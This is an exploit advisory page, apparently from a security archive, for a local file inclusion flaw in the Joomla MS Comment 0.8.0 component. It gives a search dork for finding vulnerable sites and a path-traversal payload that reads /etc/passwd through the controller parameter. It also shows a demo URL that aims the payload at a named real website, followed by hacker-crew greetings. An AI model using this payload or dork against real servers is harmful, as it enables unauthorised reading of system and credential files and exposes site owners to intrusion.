Joomla Component MS Comment 0.8.0 LFI Vulnerability

2010.05.28
Credit: Xr0b0t
Risk: High
Local: No
Remote: Yes
CWE: CWE-22


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

[!]===========================================================================[!] [~] Joomla Component MS Comment LFI Vulnerability [~] Author : Xr0b0t (nyco.danis@gmail.com) [~] Homepage : http://www.indonesiancoder.com | http://Xr0b0t.name | http://Malangcyber.com [~] Date : 16 Mei, 2010 [!]===========================================================================[!] [ Software Information ] [+] Vendor : http://www.m0r0n.com/ [+] Price : free [+] Vulnerability : LFI [+] Dork : inurl:"com_mscomment" ;) [+] Version : 0.8.0b maybe lower also affected [!]===========================================================================[!] [ Vulnerable File ] http://127.0.0.1/index.php?option=com_mscomment&controller=[INDONESIANCODER] [ XpL ] ../../../../../../../../../../../../../../../etc/passwd%00 [ d3m0 ] http://www.paparazza.com.br/index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../etc/passwd%00 etc etc etc ;] [!]===========================================================================[!] [ Thx TO ] [+] kaMtiEz dulurku seng paling ganteng, endi kok ra rene [+] INDONESIAN CODER TEAM IndonesianHacker Malang CYber CREW Magelang Cyber [+] tukulesto,M3NW5,arianom,N4CK0,abah_benu,d0ntcry,bobyhikaru,gonzhack,senot [+] Contrex,YadoY666,Pathloader,cimpli,MarahMerah.IBL13Z,r3m1ck,Geni212 [+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue,otong,CS-31,Yur4kha [ NOTE ] [+] OJOK JOTOS2an YO .. [+] Minggir semua Arumbia Team Mau LEwat ;) [+] MBEM : lup u :"> [ QUOTE ] [+] INDONESIANCODER still r0x... [+] ARUmBIA TEam Was Here Cuy MINGIR Kabeh KAte lewat .. [+] Malang Cyber Crew & Magelang Cyber Community

References:

http://xforce.iss.net/xforce/xfdb/58619
http://www.vupen.com/english/advisories/2010/1159
http://www.securityfocus.com/bid/40185
http://www.exploit-db.com/exploits/12611
http://packetstormsecurity.org/1005-exploits/joomlamscomment-lfi.txt


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top